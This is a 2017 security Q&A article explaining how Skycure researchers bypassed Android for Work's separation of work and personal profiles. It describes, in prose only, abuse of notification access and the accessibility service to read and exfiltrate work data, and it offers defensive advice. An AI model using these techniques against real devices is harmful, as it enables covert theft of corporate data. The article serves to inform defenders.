FotolEdhar - Fotolia

Android sandboxing tools: How can work data separation be bypassed?

Android for Work's sandboxing tools, which split work and personal profiles, can be bypassed with a proof-of-concept attack. Expert Michael Cobb explains how the attack works.

Skycure Ltd. researchers demonstrated a proof-of-concept attack that can bypass Android for Work enterprise mobility management's sandboxing tools, which are designed to securely separate a work profile and a personal profile on Android devices. How does the attack work, and what are the possible risks?

BYOD programs are part of today's business model, but they introduce a variety of security risks. A big challenge for those enforcing security policies is finding a way to separate personal and corporate applications and data installed on employee-owned devices without violating the owner's privacy.

Unlike mobile device management (MDM) software, which controls the entire device and all its contents, containerization technologies can balance the security needs of the enterprise with the demands of its users by segregating business and personal data. Corporate data is stored in containers, establishing a clear division between what is and is not subject to a corporate security policy.

Containerization and sandboxing tools, such as Android for Work, Apple iOS Managed Apps and Samsung Knox, are often used as a complement to or even as a replacement for MDM controls.

Android for Work sandboxing tools were introduced in version 5.0 Lollipop, though now, Google brands it as part of the Android operating system. It creates a separate work profile with business-level controls on the device, while leaving the personal profile open, neither managed, nor monitored by enterprise administrators. These profiles isolate applications, the network and storage, so apps installed within the device's personal profile cannot access activity or content in the work profile.

Researchers from the mobile threat defense company Skycure discovered two flaws in the separation logic of Android for Work sandboxing tools that enable a malicious personal app to silently view, steal and manipulate content in the work profile.

By default, work profile notifications and app icons have a red briefcase on them so they can be distinguished from personal apps. However, notifications access is a device-level permission, and Skycure found that a malicious app in the personal profile can acquire permission to view and take action on all notifications, including work notifications.

By using social engineering to trick a user into granting a malicious app notifications access permission, an attacker can send any information contained in work notifications, such as video conference login details and email messages, to a command-and-control server.

This app-in-the-middle attack could also be used to covertly read password recovery emails by dismissing the notification and archiving the recovery email using the Android Notifications API. All the app would need, in addition to permission to read and send notifications, is permission to dismiss and act on notifications.

The second attack vector is a vulnerability in Android's accessibility service, which provides features like audible narration of onscreen text. The service has read and write access to virtually all content and controls on a device, so a malicious app installed in the personal profile that acquires accessibility permissions could gain access to apps and data in the work profile, again circumventing the secure separation that Android for Work sandboxing tools are meant to enforce. IT administrators can't detect if sensitive information is being stolen, as they don't have access to a user's personal profile.

Both attack techniques leverage social engineering to dupe users into installing malicious apps. security awareness training should familiarize users with the typical tactics used by social engineers and should emphasize the importance of only installing apps created by well-established vendors from the Google Play Store. Users should also be encouraged to run the latest Android operating system, as Marshmallow (6.x) prevents abuse of the draw over apps feature that some hackers have used to trick users into granting permissions without their knowledge.

Next Steps

Learn about the Android for Work security improvements in Android Nougat

Find out how the Linux kernel memory features protect Android devices

Discover the differences between software containers and sandboxes

This was last published in July 2017

Dig Deeper on Network security